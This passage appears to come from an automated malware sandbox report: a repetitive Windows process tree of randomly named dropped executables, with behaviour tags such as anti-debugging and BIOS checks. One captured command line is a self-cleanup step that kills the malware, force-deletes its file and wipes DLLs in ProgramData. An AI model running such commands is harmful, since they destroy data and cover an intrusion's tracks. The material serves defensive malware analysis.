- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16020
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15712
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:8028
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15736
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16196
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15840
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16136
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15792
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16480
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16828
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17220
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16532
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17664
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17944
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18340
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17960
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18248
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17668
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18560
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18832
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:19152
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:14412
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15860
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:19232
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:13676
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17116
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15664
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:19604
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:19912
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20128
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20452
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:17284
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20072
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:15916
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18276
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:18708
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:10716
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:19864
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20948
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21480
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21208
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20620
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:16476
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21156
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:20532
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:7696
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21264
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21456
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:11740
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21596
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21840
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:22100
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:22440
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:21608
- - C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    C:\Users\Admin\Documents\_REgbQzZCXMoBI0Z4n2NiudF.exe
    3⤵
    PID:22352
- C:\Users\Admin\Documents\_7Nq4AGvF3WDZCcffBJ1j2tc.exe
  "C:\Users\Admin\Documents\_7Nq4AGvF3WDZCcffBJ1j2tc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4020
- C:\Users\Admin\Documents\repBD1Ir3S1KpJgYi51OUW_5.exe
  "C:\Users\Admin\Documents\repBD1Ir3S1KpJgYi51OUW_5.exe"
  2⤵
  - Executes dropped EXE
  PID:3424
- - C:\Users\Admin\Documents\repBD1Ir3S1KpJgYi51OUW_5.exe
    "C:\Users\Admin\Documents\repBD1Ir3S1KpJgYi51OUW_5.exe" -u
    3⤵
    - Executes dropped EXE
    PID:5416
- C:\Users\Admin\Documents\hty4s1_9PTPkbCzAj_nS1hej.exe
  "C:\Users\Admin\Documents\hty4s1_9PTPkbCzAj_nS1hej.exe"
  2⤵
  - Executes dropped EXE
  PID:3020
- C:\Users\Admin\Documents\Ug8wtqfslbJuPXx71pIsR45E.exe
  "C:\Users\Admin\Documents\Ug8wtqfslbJuPXx71pIsR45E.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:3828
- C:\Users\Admin\Documents\71WGDlrrCmE7NSqeAANnH5Tv.exe
  "C:\Users\Admin\Documents\71WGDlrrCmE7NSqeAANnH5Tv.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  PID:3932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im 71WGDlrrCmE7NSqeAANnH5Tv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\71WGDlrrCmE7NSqeAANnH5Tv.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:7052
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im 71WGDlrrCmE7NSqeAANnH5Tv.exe /f
      4⤵
      Kills process with taskkill
      PID:4156
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:8108
- C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
  "C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3924
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4968
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:5020
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:4944
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:1900
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:4224
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:5248
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:5656
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:6056
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6140
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Executes dropped EXE
    PID:2120
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5308
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5424
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4768
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4272
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5584
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6480
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6740
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7132
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6432
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5428
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7164
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6880
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4476
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:3692
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7228
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7632
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 24
      4⤵
      Program crash
      PID:8004
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8012
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7336
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7456
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8064
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7076
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:3728
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 24
      4⤵
      Program crash
      PID:5072
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4300
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:1668
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:1180
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8552
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8976
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7680
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:9208
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8704
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8764
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5320
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7428
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:9632
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10020
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5168
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:9804
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7664
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10468
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10848
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11180
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10548
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6680
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10796
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:9856
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4588
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11604
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11964
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8720
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:6568
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:11848
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12020
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:2320
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12052
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:5084
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:4440
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5876
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:9976
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10144
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:10100
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:7280
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:8672
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12776
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13240
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12720
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:12296
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13360
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13656
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14004
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:14304
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
    3⤵
    PID:13564
- - C:\Users\Admin\Documents\1Gx6iwl9XKt4ldRADfi44CSj.exe
